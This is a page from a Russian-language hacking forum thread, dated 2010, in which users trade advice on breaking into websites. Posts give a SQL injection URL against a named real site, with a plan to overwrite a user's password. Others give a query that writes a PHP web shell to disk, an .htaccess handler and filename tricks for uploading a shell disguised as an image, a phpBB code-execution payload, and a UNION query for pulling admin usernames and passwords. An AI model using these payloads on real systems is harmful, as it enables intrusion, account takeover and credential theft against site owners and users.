Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Это хеш можно два года брутить.
     
  2. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2GOGA075
    https://forum.antichat.ru/thread35207.html
    https://forum.antichat.ru/thread119047.html
    https://www.hackzone.ru/articles/view/id/7925/
    тут подробнее от Qwazar http://qwazar.ru/?p=7
     
    #13502 Bb0y, 11 Jun 2010
    Last edited: 11 Jun 2010
    2 people like this.
  3. qq6ka

    qq6ka Banned

    Joined:
    21 May 2010
    Messages:
    35
    Likes Received:
    19
    Reputations:
    21
    Ищу пути. В /etc/init.d/apache есть

    APACHE_HOME=/usr/apache
    CONF_FILE=/etc/apache/httpd.conf
    RUNDIR=/var/run/apache
    PIDFILE=${RUNDIR}/httpd.pid
    TOMCAT_CF=/var/apache/tomcat/conf/server.xml
    TOMCAT55_CF=/var/apache/tomcat55/conf/server.xml​

    Но!
    /etc/apache/httpd.conf, /var/apache/tomcat55/conf/server.xml - не читаются, видимо прав не хватает.

    Кто с TOMCAT 5.5 работал, подскажите где ещё посмотреть полезную инфу.
     
  4. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    кто подскажет как в это
    http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,5,6,7,8

    воткнут такой запрос
    UPDATE `users` SET `user_pwd` = '048bc95b24facd7dc82937fa99e81389' WHERE `id` =6 LIMIT 1 ;

    и вообще это реально?
     
  5. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    есть доступ к админке, через картинки не получилось залить шелл, но можно бекап бд и востановление бд, подскажите какой запрос нужно сделать что бы через востановление бд залить шелл
     
  6. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    заливай .htaccess
     
  7. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    можно подробнее?
     
  8. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    I love this game через восстановление БД тебе нужно знать путь корневой корректории.
    а запрос
    select '<? assert(stripslashes($_REQUEST[cmd])); ?>' into outfile '/home/WWW/shell.php';
     
  9. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    Но можно ж вроде через sql открыть phpinfo и оттуда уже узнаю диру?
     
  10. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    пиши в файл .htaccess:
    AddHandler application/x-httpd-php .gif

    потом заливай свой шелл изменив расширение на gif
     
  11. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    phpinfo можно поискать на сервере, ибо некоторые админы его туда зачем то пихают!
    через sql можно узнать в том случае если админ не отключил показ ошибок... тогда и покажет дерректорию!
     
  12. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    Ну вот пример для phpbb
    Code:
    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2;
    так нельзя сделать?

    а .htaccess как залить?
     
  13. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    I love this game я же тебе дал рабочий за запрос...
    и для phpbb это не подайдет совсем!!!
     
  14. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    ну если .htaccess не заливается то пиццец этому способу
     
  15. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    я понял, что мне не поможет от phpbb я просто пример привел, но у ведь путей не знаю, ошибки не показывают!
     
  16. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    pinch ну это не сильно распространенный способ!

    I love this game попробуй поискать на сервере рhpinfо.php или что то подобное,
    а так же советую пошарить на других сайтах этого сервера!
    И попробуй переименовать шел в shell.php$20.gif и залить это, может прокатить!
     
  17. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    Только jpg, но там еще стоит ограничение на размер и вроде переименовывает файл само!

    не получлилось
     
    #13517 I love this game, 12 Jun 2010
    Last edited: 12 Jun 2010
  18. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Вопрос! Можно ли вывести из таблицы ADMIN, через information_schema, значения колонок USERNAME,PASSWORD?

    id=-11'+union+select+1,concat_ws(0x3a,USERNAME,PASSWORD),3,4,5,6,7,8,9,10,11,12+from+information_schema.tables+where+table_name=0x41444d494e+--+
     
  19. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Хм.. Странный вопрос. Наверное можно, если там есть такие колонки.
     
  20. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Колонки такие есть, а запрос не знаю, как составить.
     
Thread Status:
Not open for further replies.